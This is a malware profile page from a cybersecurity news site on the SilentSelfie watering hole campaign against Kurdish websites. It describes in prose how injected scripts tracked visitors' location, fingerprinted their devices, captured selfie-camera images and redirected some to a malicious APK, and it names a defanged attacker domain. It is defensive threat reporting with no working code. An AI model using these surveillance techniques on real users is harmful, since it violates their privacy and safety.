Menu

  • Alerts
  • Incidents
  • News
  • APTs
  • Cyber Decoded
  • Cyber Hygiene
  • Cyber Review
  • Cyber Tips
  • Definitions
  • Malware
  • Threat Actors
  • Tutorials

Useful Tools

  • Password generator
  • Report an incident
  • Report to authorities
No Result
View All Result
CTF Hack Havoc
CyberMaterial
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
Hall of Hacks
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
No Result
View All Result
Hall of Hacks
CyberMaterial
No Result
View All Result
Home Malware

SilentSelfie (Infostealer) – Malware

March 2, 2025
Reading Time: 4 mins read
in Malware, Malware Campaign
SilentSelfie (Infostealer) – Malware

SilentSelfie

Type of Malware

Infostealer

Targeted Countries

Iran
Turkey
Syria

Date of Initial Activity

2022

Motivation

Data Theft

Type of Information Stolen

Personally Identifiable Information (PII)
Login Credentials

Attack Vectors

Web Browsing

Targeted Systems

Android

Overview

In early 2024, a sophisticated cyber espionage campaign, named SilentSelfie, was uncovered, revealing a widespread watering hole attack against Kurdish websites. This campaign, which had been running undetected for over a year, involved the compromise of 25 Kurdish websites with the aim of harvesting sensitive data from unsuspecting users. The attackers used a series of malicious scripts embedded within these websites to carry out reconnaissance and surveillance activities, targeting users with specific characteristics. The scripts ranged from simple geolocation tracking to more advanced techniques, such as activating users’ webcams and redirecting them to malicious APK downloads. Despite the lack of high-level exploits like zero-day vulnerabilities, the scale and persistence of the attack make it a notable example of how cyber attackers can leverage common web technologies for long-term surveillance. What makes SilentSelfie particularly alarming is the scale of the operation and the subtlety of its tactics. The first signs of the attack date back to the end of 2022, yet it remained largely unnoticed until early 2024. The attackers took advantage of trusted websites within the Kurdish community to quietly deploy their malicious scripts, which were designed to run automatically when users visited compromised pages. Over time, these scripts became increasingly sophisticated, moving from simple location-tracking mechanisms to more complex forms of surveillance, such as webcam image capture and device profiling. The attack was well-orchestrated, with different variants of the malicious code being deployed across multiple websites, making detection and mitigation efforts more difficult.

Targets

Individuals Information

How they operate

The campaign began with a relatively simple form of data collection, involving the location-tracking of website visitors. The initial variant, identified on seventeen different websites, used a minimalistic JavaScript script to collect a user’s geographical location upon page load. When a user accessed a compromised website, the script called the gL() (getLocation) function, which prompted the browser to retrieve and share the user’s location. The obtained data was then sent to a PHP script hosted on the compromised website’s server. This form of data collection was passive, relying on users’ willingness to grant location permissions and was designed to blend into the normal browsing experience. As the campaign evolved, the attackers deployed more complex versions of the script. One of the key upgrades involved adding a tracking mechanism that stored a unique cookie on the victim’s device. This cookie, named sessionIdVal, allowed the attackers to track the same user across different visits to compromised websites for an extended period. The cookie was associated with a PHP script hosted on a third-party domain, ronahi[.]video, which enabled the attackers to gather users’ IP addresses and link them to specific locations. By tracking visitors over multiple browsing sessions, the attackers were able to create detailed profiles of their targets, which could be used for further surveillance or intelligence gathering. The most sophisticated variant, which appeared later in the campaign, introduced browser configuration checks and webcam access. This version of the script was capable of detecting whether a user was visiting the site via a mobile device such as an iPhone, iPad, or Android phone. Once the user was identified as a target, the script retrieved not only the user’s geolocation but also other device information, including local IP address, battery status, screen resolution, and the device’s network connection. A significant escalation came when the script used the navigator.mediaDevices.getUserMedia() API to access the user’s selfie camera. This allowed the attackers to capture images from the user’s webcam without explicit consent, a violation of basic privacy standards. These images were encoded in Base64 and transmitted to the attacker’s server, further building the target’s profile. In addition to this, the script used the WebRTC protocol to retrieve the user’s local IP address and the navigator API to gather data on the device’s battery status and other system details. After collecting this information, it would send everything—including the webcam images—back to the PHP script for storage and further analysis. For the most advanced attack stages, the attackers also redirected selected users to download a malicious APK file. This Android application posed a threat by potentially compromising the victim’s device, enabling further exploitation. Despite the absence of zero-day vulnerabilities, the SilentSelfie campaign exhibited a high degree of technical sophistication, with attackers utilizing a blend of browser features and social engineering tactics. They avoided detection by using obfuscation tools like Obfuscator.io to hide the script’s true nature and to make it harder for security systems to analyze the malicious code. The attackers also demonstrated persistence by repeatedly updating the malicious scripts and keeping them active across multiple Kurdish websites. This multi-stage, low-profile attack strategy allowed the campaign to collect intelligence over an extended period, likely for geopolitical or intelligence-gathering purposes. In conclusion, the SilentSelfie campaign provides a troubling example of how cyber attackers can utilize basic web technologies to conduct highly targeted surveillance on specific user groups. The attackers relied on a series of increasingly complex malicious scripts to gather geolocation data, track user activity across different websites, and even capture webcam images from unsuspecting victims. The operation’s success highlights the need for increased awareness and vigilance regarding web-based threats, particularly those targeting minority communities and vulnerable populations. As web technologies evolve, so too will the tactics used by cyber attackers, making it imperative for both users and website owners to adopt stronger security practices to defend against such sophisticated espionage campaigns.  
References:
  • SilentSelfie: Uncovering a major watering hole campaign against Kurdish websites
Tags: AndroidData CollectionInfostealersIranKurdish websitesMalwareSilentSelfieSyriaTurkeyWatering Hole Attack
ADVERTISEMENT

Related Posts

Iranian Phishing Campaign (Scam) – Malware

Iranian Phishing Campaign (Scam) – Malware

March 2, 2025
Fake WalletConnect (Infostealer) – Malware

Fake WalletConnect (Infostealer) – Malware

March 2, 2025
Sniper Dz (Scam) – Malware

Sniper Dz (Scam) – Malware

March 2, 2025
TikTok Malware Scam (Trojan) – Malware

TikTok Malware Scam (Trojan) – Malware

March 2, 2025
Zombinder (Exploit Kit) – Malware

Zombinder (Exploit Kit) – Malware

March 2, 2025
EnemyBot (Botnet) – Malware

EnemyBot (Botnet) – Malware

March 2, 2025

Latest Alerts

Mozilla Urgent Firefox Patch Fixes RCE Flaws

ModiLoader Malware Targets Windows Users

Glibc Flaw Gives Linux Root Access Risk

Fileless Remcos RAT Delivery Via LNK Files

FBI Warns of AI Voice Phishing Scams

APT28 RoundPress Webmail Hack Steals Emails

Subscribe to our newsletter

    Latest Incidents

    Massive DDoS Hits Poland’s Civic Platform

    Arla Plant Cyberattack Halts Operations

    Georgia’s Harbin Clinic Hit by Data Breach

    Hackers Target Swiss Reserve Power Plant

    Coinbase Insider Attack Exposed User Data

    Cyberattack Hits J Batista Group

    CyberMaterial Logo
    • About Us
    • Contact Us
    • Jobs
    • Legal and Privacy Policy
    • Site Map

    © 2025 | CyberMaterial | All rights reserved

    Welcome Back!

    Login to your account below

    Forgotten Password?

    Retrieve your password

    Please enter your username or email address to reset your password.

    Log In

    Add New Playlist

    No Result
    View All Result
    • Alerts
    • Incidents
    • News
    • Cyber Decoded
    • Cyber Hygiene
    • Cyber Review
    • Definitions
    • Malware
    • Cyber Tips
    • Tutorials
    • Advanced Persistent Threats
    • Threat Actors
    • Report an incident
    • Password Generator
    • About Us
    • Contact Us
    • Advertise with us

    Copyright © 2025 CyberMaterial